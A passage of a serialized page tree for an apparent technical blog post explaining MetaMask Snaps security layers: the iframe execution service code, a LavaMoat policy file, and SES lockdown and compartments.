value":38312},{"type":26,"tag":137,"props":38875,"children":38876},{"style":5601},[38877],{"type":32,"value":470},{"type":26,"tag":137,"props":38879,"children":38880},{"style":5682},[38881],{"type":32,"value":38882},"initEnvStream",{"type":26,"tag":137,"props":38884,"children":38885},{"style":5601},[38886],{"type":32,"value":165},{"type":26,"tag":137,"props":38888,"children":38889},{"style":5584},[38890],{"type":32,"value":38793},{"type":26,"tag":137,"props":38892,"children":38893},{"style":5601},[38894],{"type":32,"value":6430},{"type":26,"tag":137,"props":38896,"children":38897},{"class":5559,"line":6247},[38898],{"type":26,"tag":137,"props":38899,"children":38900},{"style":5564},[38901],{"type":32,"value":38902},"  // ...\n",{"type":26,"tag":137,"props":38904,"children":38905},{"class":5559,"line":6270},[38906],{"type":26,"tag":137,"props":38907,"children":38908},{"style":5601},[38909],{"type":32,"value":6507},{"type":26,"tag":35,"props":38911,"children":38912},{},[38913,38914,38919,38921,38927],{"type":32,"value":19206},{"type":26,"tag":130,"props":38915,"children":38917},{"className":38916},[],[38918],{"type":32,"value":38489},{"type":32,"value":38920}," registers message handlers that facilitate communication between Metamask and snaps within the iFrame. The ",{"type":26,"tag":130,"props":38922,"children":38924},{"className":38923},[],[38925],{"type":32,"value":38926},"${controllerName}:executeSnap",{"type":32,"value":38928}," handler triggers the snap execution process.",{"type":26,"tag":21485,"props":38930,"children":38932},{"id":38931},"step-by-step-execution-from-initialization-to-iframe-creation",[38933,38935],{"type":32,"value":38934},"Step-by-Step Execution: From Initialization to iFrame ",{"type":26,"tag":41,"props":38936,"children":38939},{"href":38937,"rel":38938},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-controllers/src/services/iframe/IframeExecutionService.ts#L31",[45],[38940],{"type":32,"value":38941},"creation",{"type":26,"tag":5512,"props":38943,"children":38945},{"className":38526,"code":38944,"language":38528,"meta":7,"style":7},"protected async initEnvStream(jobId: string): Promise\u003C{\n    worker: Window;\n    stream: BasePostMessageStream;\n  }> {\n    const iframeWindow = await createWindow(this.iframeUrl.toString(), jobId);\n\n    const stream = new WindowPostMessageStream({\n      name: 'parent',\n      target: 'child',\n      targetWindow: iframeWindow,\n      targetOrigin: '*',\n    });\n\n    return { worker: iframeWindow, stream };\n  }\n",[38946],{"type":26,"tag":130,"props":38947,"children":38948},{"__ignoreMap":7},[38949,38998,39019,39040,39048,39112,39119,39147,39164,39181,39198,39215,39222,39229,39253],{"type":26,"tag":137,"props":38950,"children":38951},{"class":5559,"line":5560},[38952,38957,38962,38967,38971,38975,38979,38983,38988,38993],{"type":26,"tag":137,"props":38953,"children":38954},{"style":5584},[38955],{"type":32,"value":38956},"protected",{"type":26,"tag":137,"props":38958,"children":38959},{"style":5584},[38960],{"type":32,"value":38961}," async",{"type":26,"tag":137,"props":38963,"children":38964},{"style":5682},[38965],{"type":32,"value":38966}," initEnvStream",{"type":26,"tag":137,"props":38968,"children":38969},{"style":5601},[38970],{"type":32,"value":165},{"type":26,"tag":137,"props":38972,"children":38973},{"style":5584},[38974],{"type":32,"value":38793},{"type":26,"tag":137,"props":38976,"children":38977},{"style":5601},[38978],{"type":32,"value":17923},{"type":26,"tag":137,"props":38980,"children":38981},{"style":5584},[38982],{"type":32,"value":32260},{"type":26,"tag":137,"props":38984,"children":38985},{"style":5601},[38986],{"type":32,"value":38987},"): ",{"type":26,"tag":137,"props":38989,"children":38990},{"style":6009},[38991],{"type":32,"value":38992},"Promise",{"type":26,"tag":137,"props":38994,"children":38995},{"style":5601},[38996],{"type":32,"value":38997},"\u003C{\n",{"type":26,"tag":137,"props":38999,"children":39000},{"class":5559,"line":5412},[39001,39006,39010,39015],{"type":26,"tag":137,"props":39002,"children":39003},{"style":5584},[39004],{"type":32,"value":39005},"    worker",{"type":26,"tag":137,"props":39007,"children":39008},{"style":5590},[39009],{"type":32,"value":7072},{"type":26,"tag":137,"props":39011,"children":39012},{"style":6009},[39013],{"type":32,"value":39014}," Window",{"type":26,"tag":137,"props":39016,"children":39017},{"style":5601},[39018],{"type":32,"value":5604},{"type":26,"tag":137,"props":39020,"children":39021},{"class":5559,"line":5417},[39022,39027,39031,39036],{"type":26,"tag":137,"props":39023,"children":39024},{"style":5584},[39025],{"type":32,"value":39026},"    stream",{"type":26,"tag":137,"props":39028,"children":39029},{"style":5590},[39030],{"type":32,"value":7072},{"type":26,"tag":137,"props":39032,"children":39033},{"style":6009},[39034],{"type":32,"value":39035}," BasePostMessageStream",{"type":26,"tag":137,"props":39037,"children":39038},{"style":5601},[39039],{"type":32,"value":5604},{"type":26,"tag":137,"props":39041,"children":39042},{"class":5559,"line":5642},[39043],{"type":26,"tag":137,"props":39044,"children":39045},{"style":5601},[39046],{"type":32,"value":39047},"  }> {\n",{"type":26,"tag":137,"props":39049,"children":39050},{"class":5559,"line":5745},[39051,39056,39061,39065,39069,39074,39078,39082,39086,39091,39095,39100,39104,39108],{"type":26,"tag":137,"props":39052,"children":39053},{"style":5601},[39054],{"type":32,"value":39055},"    const ",{"type":26,"tag":137,"props":39057,"children":39058},{"style":5584},[39059],{"type":32,"value":39060},"iframeWindow",{"type":26,"tag":137,"props":39062,"children":39063},{"style":5590},[39064],{"type":32,"value":5593},{"type":26,"tag":137,"props":39066,"children":39067},{"style":5610},[39068],{"type":32,"value":38807},{"type":26,"tag":137,"props":39070,"children":39071},{"style":5682},[39072],{"type":32,"value":39073}," createWindow",{"type":26,"tag":137,"props":39075,"children":39076},{"style":5601},[39077],{"type":32,"value":165},{"type":26,"tag":137,"props":39079,"children":39080},{"style":5573},[39081],{"type":32,"value":20285},{"type":26,"tag":137,"props":39083,"children":39084},{"style":5601},[39085],{"type":32,"value":470},{"type":26,"tag":137,"props":39087,"children":39088},{"style":5584},[39089],{"type":32,"value":39090},"iframeUrl",{"type":26,"tag":137,"props":39092,"children":39093},{"style":5601},[39094],{"type":32,"value":470},{"type":26,"tag":137,"props":39096,"children":39097},{"style":5682},[39098],{"type":32,"value":39099},"toString",{"type":26,"tag":137,"props":39101,"children":39102},{"style":5601},[39103],{"type":32,"value":20968},{"type":26,"tag":137,"props":39105,"children":39106},{"style":5584},[39107],{"type":32,"value":38793},{"type":26,"tag":137,"props":39109,"children":39110},{"style":5601},[39111],{"type":32,"value":6430},{"type":26,"tag":137,"props":39113,"children":39114},{"class":5559,"line":5850},[39115],{"type":26,"tag":137,"props":39116,"children":39117},{"emptyLinePlaceholder":18},[39118],{"type":32,"value":6276},{"type":26,"tag":137,"props":39120,"children":39121},{"class":5559,"line":5878},[39122,39126,39130,39134,39138,39143],{"type":26,"tag":137,"props":39123,"children":39124},{"style":5601},[39125],{"type":32,"value":39055},{"type":26,"tag":137,"props":39127,"children":39128},{"style":5584},[39129],{"type":32,"value":38857},{"type":26,"tag":137,"props":39131,"children":39132},{"style":5590},[39133],{"type":32,"value":5593},{"type":26,"tag":137,"props":39135,"children":39136},{"style":5573},[39137],{"type":32,"value":34528},{"type":26,"tag":137,"props":39139,"children":39140},{"style":5682},[39141],{"type":32,"value":39142}," WindowPostMessageStream",{"type":26,"tag":137,"props":39144,"children":39145},{"style":5601},[39146],{"type":32,"value":17732},{"type":26,"tag":137,"props":39148,"children":39149},{"class":5559,"line":5891},[39150,39155,39160],{"type":26,"tag":137,"props":39151,"children":39152},{"style":5584},[39153],{"type":32,"value":39154},"      name:",{"type":26,"tag":137,"props":39156,"children":39157},{"style":6837},[39158],{"type":32,"value":39159}," 'parent'",{"type":26,"tag":137,"props":39161,"children":39162},{"style":5601},[39163],{"type":32,"value":6099},{"type":26,"tag":137,"props":39165,"children":39166},{"class":5559,"line":5909},[39167,39172,39177],{"type":26,"tag":137,"props":39168,"children":39169},{"style":5584},[39170],{"type":32,"value":39171},"      target:",{"type":26,"tag":137,"props":39173,"children":39174},{"style":6837},[39175],{"type":32,"value":39176}," 'child'",{"type":26,"tag":137,"props":39178,"children":39179},{"style":5601},[39180],{"type":32,"value":6099},{"type":26,"tag":137,"props":39182,"children":39183},{"class":5559,"line":5930},[39184,39189,39194],{"type":26,"tag":137,"props":39185,"children":39186},{"style":5584},[39187],{"type":32,"value":39188},"      targetWindow:",{"type":26,"tag":137,"props":39190,"children":39191},{"style":5584},[39192],{"type":32,"value":39193}," iframeWindow",{"type":26,"tag":137,"props":39195,"children":39196},{"style":5601},[39197],{"type":32,"value":6099},{"type":26,"tag":137,"props":39199,"children":39200},{"class":5559,"line":5939},[39201,39206,39211],{"type":26,"tag":137,"props":39202,"children":39203},{"style":5584},[39204],{"type":32,"value":39205},"      targetOrigin:",{"type":26,"tag":137,"props":39207,"children":39208},{"style":6837},[39209],{"type":32,"value":39210}," '*'",{"type":26,"tag":137,"props":39212,"children":39213},{"style":5601},[39214],{"type":32,"value":6099},{"type":26,"tag":137,"props":39216,"children":39217},{"class":5559,"line":6191},[39218],{"type":26,"tag":137,"props":39219,"children":39220},{"style":5601},[39221],{"type":32,"value":34852},{"type":26,"tag":137,"props":39223,"children":39224},{"class":5559,"line":6208},[39225],{"type":26,"tag":137,"props":39226,"children":39227},{"emptyLinePlaceholder":18},[39228],{"type":32,"value":6276},{"type":26,"tag":137,"props":39230,"children":39231},{"class":5559,"line":6225},[39232,39237,39241,39245,39249],{"type":26,"tag":137,"props":39233,"children":39234},{"style":5601},[39235],{"type":32,"value":39236},"    return { worker: ",{"type":26,"tag":137,"props":39238,"children":39239},{"style":5584},[39240],{"type":32,"value":39060},{"type":26,"tag":137,"props":39242,"children":39243},{"style":5601},[39244],{"type":32,"value":1108},{"type":26,"tag":137,"props":39246,"children":39247},{"style":5584},[39248],{"type":32,"value":38857},{"type":26,"tag":137,"props":39250,"children":39251},{"style":5601},[39252],{"type":32,"value":20892},{"type":26,"tag":137,"props":39254,"children":39255},{"class":5559,"line":6238},[39256],{"type":26,"tag":137,"props":39257,"children":39258},{"style":5601},[39259],{"type":32,"value":8457},{"type":26,"tag":35,"props":39261,"children":39262},{},[39263,39265,39271,39273,39280],{"type":32,"value":39264},"Here the iframe is created via ",{"type":26,"tag":130,"props":39266,"children":39268},{"className":39267},[],[39269],{"type":32,"value":39270},"createWindow",{"type":32,"value":39272},", which is defined in snaps-utils ",{"type":26,"tag":41,"props":39274,"children":39277},{"href":39275,"rel":39276},"https://github.com/MetaMask/snaps/blob/92fcf31678c13067615e6e69681e57a542a2c58a/packages/snaps-utils/src/iframe.ts#L17",[45],[39278],{"type":32,"value":39279},"package",{"type":32,"value":7072},{"type":26,"tag":5512,"props":39282,"children":39284},{"className":38526,"code":39283,"language":38528,"meta":7,"style":7},"const iframe = document.createElement('iframe');\n    iframe.setAttribute('id', id);\n    iframe.setAttribute('data-testid', 'snaps-iframe');\n\n    if (sandbox) {\n      iframe.setAttribute('sandbox', 'allow-scripts');\n    }\n    iframe.setAttribute('src', uri);\n    document.body.appendChild(iframe);\n",[39285],{"type":26,"tag":130,"props":39286,"children":39287},{"__ignoreMap":7},[39288,39331,39369,39406,39413,39433,39471,39478,39515],{"type":26,"tag":137,"props":39289,"children":39290},{"class":5559,"line":5560},[39291,39295,39300,39304,39309,39313,39318,39322,39327],{"type":26,"tag":137,"props":39292,"children":39293},{"style":5573},[39294],{"type":32,"value":12244},{"type":26,"tag":137,"props":39296,"children":39297},{"style":5584},[39298],{"type":32,"value":39299}," iframe",{"type":26,"tag":137,"props":39301,"children":39302},{"style":5590},[39303],{"type":32,"value":5593},{"type":26,"tag":137,"props":39305,"children":39306},{"style":5584},[39307],{"type":32,"value":39308}," document",{"type":26,"tag":137,"props":39310,"children":39311},{"style":5601},[39312],{"type":32,"value":470},{"type":26,"tag":137,"props":39314,"children":39315},{"style":5682},[39316],{"type":32,"value":39317},"createElement",{"type":26,"tag":137,"props":39319,"children":39320},{"style":5601},[39321],{"type":32,"value":165},{"type":26,"tag":137,"props":39323,"children":39324},{"style":6837},[39325],{"type":32,"value":39326},"'iframe'",{"type":26,"tag":137,"props":39328,"children":39329},{"style":5601},[39330],{"type":32,"value":6430},{"type":26,"tag":137,"props":39332,"children":39333},{"class":5559,"line":5412},[39334,39339,39343,39348,39352,39357,39361,39365],{"type":26,"tag":137,"props":39335,"children":39336},{"style":5584},[39337],{"type":32,"value":39338},"    iframe",{"type":26,"tag":137,"props":39340,"children":39341},{"style":5601},[39342],{"type":32,"value":470},{"type":26,"tag":137,"props":39344,"children":39345},{"style":5682},[39346],{"type":32,"value":39347},"setAttribute",{"type":26,"tag":137,"props":39349,"children":39350},{"style":5601},[39351],{"type":32,"value":165},{"type":26,"tag":137,"props":39353,"children":39354},{"style":6837},[39355],{"type":32,"value":39356},"'id'",{"type":26,"tag":137,"props":39358,"children":39359},{"style":5601},[39360],{"type":32,"value":1108},{"type":26,"tag":137,"props":39362,"children":39363},{"style":5584},[39364],{"type":32,"value":6077},{"type":26,"tag":137,"props":39366,"children":39367},{"style":5601},[39368],{"type":32,"value":6430},{"type":26,"tag":137,"props":39370,"children":39371},{"class":5559,"line":5417},[39372,39376,39380,39384,39388,39393,39397,39402],{"type":26,"tag":137,"props":39373,"children":39374},{"style":5584},[39375],{"type":32,"value":39338},{"type":26,"tag":137,"props":39377,"children":39378},{"style":5601},[39379],{"type":32,"value":470},{"type":26,"tag":137,"props":39381,"children":39382},{"style":5682},[39383],{"type":32,"value":39347},{"type":26,"tag":137,"props":39385,"children":39386},{"style":5601},[39387],{"type":32,"value":165},{"type":26,"tag":137,"props":39389,"children":39390},{"style":6837},[39391],{"type":32,"value":39392},"'data-testid'",{"type":26,"tag":137,"props":39394,"children":39395},{"style":5601},[39396],{"type":32,"value":1108},{"type":26,"tag":137,"props":39398,"children":39399},{"style":6837},[39400],{"type":32,"value":39401},"'snaps-iframe'",{"type":26,"tag":137,"props":39403,"children":39404},{"style":5601},[39405],{"type":32,"value":6430},{"type":26,"tag":137,"props":39407,"children":39408},{"class":5559,"line":5642},[39409],{"type":26,"tag":137,"props":39410,"children":39411},{"emptyLinePlaceholder":18},[39412],{"type":32,"value":6276},{"type":26,"tag":137,"props":39414,"children":39415},{"class":5559,"line":5745},[39416,39420,39424,39429],{"type":26,"tag":137,"props":39417,"children":39418},{"style":5610},[39419],{"type":32,"value":14870},{"type":26,"tag":137,"props":39421,"children":39422},{"style":5601},[39423],{"type":32,"value":4625},{"type":26,"tag":137,"props":39425,"children":39426},{"style":5584},[39427],{"type":32,"value":39428},"sandbox",{"type":26,"tag":137,"props":39430,"children":39431},{"style":5601},[39432],{"type":32,"value":17395},{"type":26,"tag":137,"props":39434,"children":39435},{"class":5559,"line":5850},[39436,39441,39445,39449,39453,39458,39462,39467],{"type":26,"tag":137,"props":39437,"children":39438},{"style":5584},[39439],{"type":32,"value":39440},"      iframe",{"type":26,"tag":137,"props":39442,"children":39443},{"style":5601},[39444],{"type":32,"value":470},{"type":26,"tag":137,"props":39446,"children":39447},{"style":5682},[39448],{"type":32,"value":39347},{"type":26,"tag":137,"props":39450,"children":39451},{"style":5601},[39452],{"type":32,"value":165},{"type":26,"tag":137,"props":39454,"children":39455},{"style":6837},[39456],{"type":32,"value":39457},"'sandbox'",{"type":26,"tag":137,"props":39459,"children":39460},{"style":5601},[39461],{"type":32,"value":1108},{"type":26,"tag":137,"props":39463,"children":39464},{"style":6837},[39465],{"type":32,"value":39466},"'allow-scripts'",{"type":26,"tag":137,"props":39468,"children":39469},{"style":5601},[39470],{"type":32,"value":6430},{"type":26,"tag":137,"props":39472,"children":39473},{"class":5559,"line":5878},[39474],{"type":26,"tag":137,"props":39475,"children":39476},{"style":5601},[39477],{"type":32,"value":5945},{"type":26,"tag":137,"props":39479,"children":39480},{"class":5559,"line":5891},[39481,39485,39489,39493,39497,39502,39506,39511],{"type":26,"tag":137,"props":39482,"children":39483},{"style":5584},[39484],{"type":32,"value":39338},{"type":26,"tag":137,"props":39486,"children":39487},{"style":5601},[39488],{"type":32,"value":470},{"type":26,"tag":137,"props":39490,"children":39491},{"style":5682},[39492],{"type":32,"value":39347},{"type":26,"tag":137,"props":39494,"children":39495},{"style":5601},[39496],{"type":32,"value":165},{"type":26,"tag":137,"props":39498,"children":39499},{"style":6837},[39500],{"type":32,"value":39501},"'src'",{"type":26,"tag":137,"props":39503,"children":39504},{"style":5601},[39505],{"type":32,"value":1108},{"type":26,"tag":137,"props":39507,"children":39508},{"style":5584},[39509],{"type":32,"value":39510},"uri",{"type":26,"tag":137,"props":39512,"children":39513},{"style":5601},[39514],{"type":32,"value":6430},{"type":26,"tag":137,"props":39516,"children":39517},{"class":5559,"line":5909},[39518,39522,39526,39530,39534,39539,39543,39548],{"type":26,"tag":137,"props":39519,"children":39520},{"style":5584},[39521],{"type":32,"value":37269},{"type":26,"tag":137,"props":39523,"children":39524},{"style":5601},[39525],{"type":32,"value":470},{"type":26,"tag":137,"props":39527,"children":39528},{"style":5584},[39529],{"type":32,"value":34995},{"type":26,"tag":137,"props":39531,"children":39532},{"style":5601},[39533],{"type":32,"value":470},{"type":26,"tag":137,"props":39535,"children":39536},{"style":5682},[39537],{"type":32,"value":39538},"appendChild",{"type":26,"tag":137,"props":39540,"children":39541},{"style":5601},[39542],{"type":32,"value":165},{"type":26,"tag":137,"props":39544,"children":39545},{"style":5584},[39546],{"type":32,"value":39547},"iframe",{"type":26,"tag":137,"props":39549,"children":39550},{"style":5601},[39551],{"type":32,"value":6430},{"type":26,"tag":35,"props":39553,"children":39554},{},[39555],{"type":32,"value":39556},"This enables the iframe to be created with sandbox attributes, ensuring secure execution.",{"type":26,"tag":118,"props":39558,"children":39560},{"id":39559},"lavamoat-against-supply-chain-attacks-layer-2",[39561],{"type":32,"value":39562},"LavaMoat against Supply Chain Attacks - Layer 2",{"type":26,"tag":35,"props":39564,"children":39565},{},[39566],{"type":32,"value":39567},"Instances of software supply chain breaches occur when a malicious component infiltrates a developer's application. Subsequently, attackers exploit the component to extract critical information, such as private access keys. To safeguard against these issues, Metamask employs a tool called LavaMoat.",{"type":26,"tag":35,"props":39569,"children":39570},{},[39571,39573,39579],{"type":32,"value":39572},"Malicious dependencies might utilize built-in modules like ",{"type":26,"tag":130,"props":39574,"children":39576},{"className":39575},[],[39577],{"type":32,"value":39578},"fs",{"type":32,"value":39580},". Alternatively, they may inject malicious code into the npm package to target global objects, like the window and document. They might also include code that leverages XMLHttpRequest to make unauthorized requests to external servers, enabling the exfiltration of sensitive user information.",{"type":26,"tag":35,"props":39582,"children":39583},{},[39584],{"type":32,"value":39585},"In order to prevent this, Metamask Snaps use a Policy file provided by LavaMoat, that grants the platform API and the Globals access just to the essentials components. This limits the access to fields of powerful objects to corrupted dependencies.",{"type":26,"tag":35,"props":39587,"children":39588},{},[39589,39591,39598],{"type":32,"value":39590},"This is how a Policy file related to the iframes ",{"type":26,"tag":41,"props":39592,"children":39595},{"href":39593,"rel":39594},"https://github.com/MetaMask/snaps/blob/c5ddd897734f900f459c66a91f3334e76903825c/packages/snaps-execution-environments/lavamoat/browserify/iframe/policy.json#L49",[45],[39596],{"type":32,"value":39597},"looks",{"type":32,"value":7072},{"type":26,"tag":5512,"props":39600,"children":39602},{"className":36591,"code":39601,"language":36593,"meta":7,"style":7},"\"@metamask/post-message-stream\": {\n      \"globals\": {\n        \"MessageEvent.prototype\": true,\n        \"WorkerGlobalScope\": true,\n        \"addEventListener\": true,\n        \"browser\": true,\n        \"chrome\": true,\n        \"location.origin\": true,\n        \"postMessage\": true,\n        \"removeEventListener\": true\n      },\n      \"packages\": {\n        \"@metamask/post-message-stream>@metamask/utils\": true,\n        \"@metamask/post-message-stream>readable-stream\": true\n      }\n    }\n",[39603],{"type":26,"tag":130,"props":39604,"children":39605},{"__ignoreMap":7},[39606,39619,39631,39651,39671,39691,39711,39731,39751,39771,39788,39796,39808,39828,39844,39851],{"type":26,"tag":137,"props":39607,"children":39608},{"class":5559,"line":5560},[39609,39614],{"type":26,"tag":137,"props":39610,"children":39611},{"style":6837},[39612],{"type":32,"value":39613},"\"@metamask/post-message-stream\"",{"type":26,"tag":137,"props":39615,"children":39616},{"style":5601},[39617],{"type":32,"value":39618},": {\n",{"type":26,"tag":137,"props":39620,"children":39621},{"class":5559,"line":5412},[39622,39627],{"type":26,"tag":137,"props":39623,"children":39624},{"style":5584},[39625],{"type":32,"value":39626},"      \"globals\"",{"type":26,"tag":137,"props":39628,"children":39629},{"style":5601},[39630],{"type":32,"value":39618},{"type":26,"tag":137,"props":39632,"children":39633},{"class":5559,"line":5417},[39634,39639,39643,39647],{"type":26,"tag":137,"props":39635,"children":39636},{"style":5584},[39637],{"type":32,"value":39638},"        \"MessageEvent.prototype\"",{"type":26,"tag":137,"props":39640,"children":39641},{"style":5601},[39642],{"type":32,"value":17923},{"type":26,"tag":137,"props":39644,"children":39645},{"style":5573},[39646],{"type":32,"value":146},{"type":26,"tag":137,"props":39648,"children":39649},{"style":5601},[39650],{"type":32,"value":6099},{"type":26,"tag":137,"props":39652,"children":39653},{"class":5559,"line":5642},[39654,39659,39663,39667],{"type":26,"tag":137,"props":39655,"children":39656},{"style":5584},[39657],{"type":32,"value":39658},"        \"WorkerGlobalScope\"",{"type":26,"tag":137,"props":39660,"children":39661},{"style":5601},[39662],{"type":32,"value":17923},{"type":26,"tag":137,"props":39664,"children":39665},{"style":5573},[39666],{"type":32,"value":146},{"type":26,"tag":137,"props":39668,"children":39669},{"style":5601},[39670],{"type":32,"value":6099},{"type":26,"tag":137,"props":39672,"children":39673},{"class":5559,"line":5745},[39674,39679,39683,39687],{"type":26,"tag":137,"props":39675,"children":39676},{"style":5584},[39677],{"type":32,"value":39678},"        \"addEventListener\"",{"type":26,"tag":137,"props":39680,"children":39681},{"style":5601},[39682],{"type":32,"value":17923},{"type":26,"tag":137,"props":39684,"children":39685},{"style":5573},[39686],{"type":32,"value":146},{"type":26,"tag":137,"props":39688,"children":39689},{"style":5601},[39690],{"type":32,"value":6099},{"type":26,"tag":137,"props":39692,"children":39693},{"class":5559,"line":5850},[39694,39699,39703,39707],{"type":26,"tag":137,"props":39695,"children":39696},{"style":5584},[39697],{"type":32,"value":39698},"        \"browser\"",{"type":26,"tag":137,"props":39700,"children":39701},{"style":5601},[39702],{"type":32,"value":17923},{"type":26,"tag":137,"props":39704,"children":39705},{"style":5573},[39706],{"type":32,"value":146},{"type":26,"tag":137,"props":39708,"children":39709},{"style":5601},[39710],{"type":32,"value":6099},{"type":26,"tag":137,"props":39712,"children":39713},{"class":5559,"line":5878},[39714,39719,39723,39727],{"type":26,"tag":137,"props":39715,"children":39716},{"style":5584},[39717],{"type":32,"value":39718},"        \"chrome\"",{"type":26,"tag":137,"props":39720,"children":39721},{"style":5601},[39722],{"type":32,"value":17923},{"type":26,"tag":137,"props":39724,"children":39725},{"style":5573},[39726],{"type":32,"value":146},{"type":26,"tag":137,"props":39728,"children":39729},{"style":5601},[39730],{"type":32,"value":6099},{"type":26,"tag":137,"props":39732,"children":39733},{"class":5559,"line":5891},[39734,39739,39743,39747],{"type":26,"tag":137,"props":39735,"children":39736},{"style":5584},[39737],{"type":32,"value":39738},"        \"location.origin\"",{"type":26,"tag":137,"props":39740,"children":39741},{"style":5601},[39742],{"type":32,"value":17923},{"type":26,"tag":137,"props":39744,"children":39745},{"style":5573},[39746],{"type":32,"value":146},{"type":26,"tag":137,"props":39748,"children":39749},{"style":5601},[39750],{"type":32,"value":6099},{"type":26,"tag":137,"props":39752,"children":39753},{"class":5559,"line":5909},[39754,39759,39763,39767],{"type":26,"tag":137,"props":39755,"children":39756},{"style":5584},[39757],{"type":32,"value":39758},"        \"postMessage\"",{"type":26,"tag":137,"props":39760,"children":39761},{"style":5601},[39762],{"type":32,"value":17923},{"type":26,"tag":137,"props":39764,"children":39765},{"style":5573},[39766],{"type":32,"value":146},{"type":26,"tag":137,"props":39768,"children":39769},{"style":5601},[39770],{"type":32,"value":6099},{"type":26,"tag":137,"props":39772,"children":39773},{"class":5559,"line":5930},[39774,39779,39783],{"type":26,"tag":137,"props":39775,"children":39776},{"style":5584},[39777],{"type":32,"value":39778},"        \"removeEventListener\"",{"type":26,"tag":137,"props":39780,"children":39781},{"style":5601},[39782],{"type":32,"value":17923},{"type":26,"tag":137,"props":39784,"children":39785},{"style":5573},[39786],{"type":32,"value":39787},"true\n",{"type":26,"tag":137,"props":39789,"children":39790},{"class":5559,"line":5939},[39791],{"type":26,"tag":137,"props":39792,"children":39793},{"style":5601},[39794],{"type":32,"value":39795},"      },\n",{"type":26,"tag":137,"props":39797,"children":39798},{"class":5559,"line":6191},[39799,39804],{"type":26,"tag":137,"props":39800,"children":39801},{"style":5584},[39802],{"type":32,"value":39803},"      \"packages\"",{"type":26,"tag":137,"props":39805,"children":39806},{"style":5601},[39807],{"type":32,"value":39618},{"type":26,"tag":137,"props":39809,"children":39810},{"class":5559,"line":6208},[39811,39816,39820,39824],{"type":26,"tag":137,"props":39812,"children":39813},{"style":5584},[39814],{"type":32,"value":39815},"        \"@metamask/post-message-stream>@metamask/utils\"",{"type":26,"tag":137,"props":39817,"children":39818},{"style":5601},[39819],{"type":32,"value":17923},{"type":26,"tag":137,"props":39821,"children":39822},{"style":5573},[39823],{"type":32,"value":146},{"type":26,"tag":137,"props":39825,"children":39826},{"style":5601},[39827],{"type":32,"value":6099},{"type":26,"tag":137,"props":39829,"children":39830},{"class":5559,"line":6225},[39831,39836,39840],{"type":26,"tag":137,"props":39832,"children":39833},{"style":5584},[39834],{"type":32,"value":39835},"        \"@metamask/post-message-stream>readable-stream\"",{"type":26,"tag":137,"props":39837,"children":39838},{"style":5601},[39839],{"type":32,"value":17923},{"type":26,"tag":137,"props":39841,"children":39842},{"style":5573},[39843],{"type":32,"value":39787},{"type":26,"tag":137,"props":39845,"children":39846},{"class":5559,"line":6238},[39847],{"type":26,"tag":137,"props":39848,"children":39849},{"style":5601},[39850],{"type":32,"value":15255},{"type":26,"tag":137,"props":39852,"children":39853},{"class":5559,"line":6247},[39854],{"type":26,"tag":137,"props":39855,"children":39856},{"style":5601},[39857],{"type":32,"value":5945},{"type":26,"tag":35,"props":39859,"children":39860},{},[39861,39863,39869,39871,39877,39879,39885,39887,39893,39894,39900],{"type":32,"value":39862},"One crucial aspect of the policy, apart from the ",{"type":26,"tag":130,"props":39864,"children":39866},{"className":39865},[],[39867],{"type":32,"value":39868},"globals",{"type":32,"value":39870}," section, is the ",{"type":26,"tag":130,"props":39872,"children":39874},{"className":39873},[],[39875],{"type":32,"value":39876},"packages",{"type":32,"value":39878}," segment. This section permits the ",{"type":26,"tag":130,"props":39880,"children":39882},{"className":39881},[],[39883],{"type":32,"value":39884},"@metamask/post-message-stream",{"type":32,"value":39886},"package to exclusively interact with the package ",{"type":26,"tag":130,"props":39888,"children":39890},{"className":39889},[],[39891],{"type":32,"value":39892},"@metamask/utils",{"type":32,"value":3339},{"type":26,"tag":130,"props":39895,"children":39897},{"className":39896},[],[39898],{"type":32,"value":39899},"readable-stream",{"type":32,"value":39901},". It ensures that interactions with potentially compromised packages are disallowed.",{"type":26,"tag":35,"props":39903,"children":39904},{},[39905,39907,39913],{"type":32,"value":39906},"LavaMoat additionally provides protection against prototype pollution attacks, since a malicious extension could use it to tamper with a legitimate function with arbitrary code. To safeguard against this, LavaMoat uses SES ",{"type":26,"tag":130,"props":39908,"children":39910},{"className":39909},[],[39911],{"type":32,"value":39912},"lockdown",{"type":32,"value":39914}," function to freeze all javascript builtins prototypes.",{"type":26,"tag":118,"props":39916,"children":39918},{"id":39917},"secure-ecmascript-ses-sandbox-layer-3",[39919],{"type":32,"value":39920},"Secure EcmaScript (SES) sandbox - Layer 3",{"type":26,"tag":35,"props":39922,"children":39923},{},[39924,39926,39933],{"type":32,"value":39925},"Within the iframe and after the lavamoat execution, the metamask sandbox uses the ",{"type":26,"tag":41,"props":39927,"children":39930},{"href":39928,"rel":39929},"https://github.com/endojs/endo/tree/master/packages/ses",[45],[39931],{"type":32,"value":39932},"Secure EcmaScript (SES)",{"type":32,"value":39934}," as a way to setup limits to the snap. Let's dig into how it works:",{"type":26,"tag":21485,"props":39936,"children":39938},{"id":39937},"ses-fundamentals",[39939],{"type":32,"value":39940},"SES Fundamentals",{"type":26,"tag":39942,"props":39943,"children":39944},"h5",{"id":39912},[39945],{"type":32,"value":39946},"Lockdown",{"type":26,"tag":35,"props":39948,"children":39949},{},[39950,39952,39958],{"type":32,"value":39951},"As the first step of setting up the SES sandbox, Metamask executes the ",{"type":26,"tag":130,"props":39953,"children":39955},{"className":39954},[],[39956],{"type":32,"value":39957},"lockdown()",{"type":32,"value":39959}," function, which protects javascript objects against some attacks, mainly:",{"type":26,"tag":4820,"props":39961,"children":39962},{},[39963,39976],{"type":26,"tag":3430,"props":39964,"children":39965},{},[39966,39968,39974],{"type":32,"value":39967},"Prototype Pollution\nLockdown executes ",{"type":26,"tag":130,"props":39969,"children":39971},{"className":39970},[],[39972],{"type":32,"value":39973},"Object.freeze",{"type":32,"value":39975}," against all javascript builtins prototypes, preventing these attacks.",{"type":26,"tag":3430,"props":39977,"children":39978},{},[39979,39981,39987,39989,39995],{"type":32,"value":39980},"Information disclosure\nLockdown removes some sensitive information that can be disclosed by some javascript builtin objects, such as the ",{"type":26,"tag":130,"props":39982,"children":39984},{"className":39983},[],[39985],{"type":32,"value":39986},"trace",{"type":32,"value":39988}," attribute in an ",{"type":26,"tag":130,"props":39990,"children":39992},{"className":39991},[],[39993],{"type":32,"value":39994},"Error",{"type":32,"value":39996}," object, which contains the stack trace of the error.",{"type":26,"tag":39942,"props":39998,"children":40000},{"id":39999},"compartment",[40001],{"type":32,"value":40002},"Compartment",{"type":26,"tag":35,"props":40004,"children":40005},{},[40006,40008,40014,40016,40021],{"type":32,"value":40007},"Compartments serve as the fundamental security layer within the snap execution environment. Their primary function is to establish 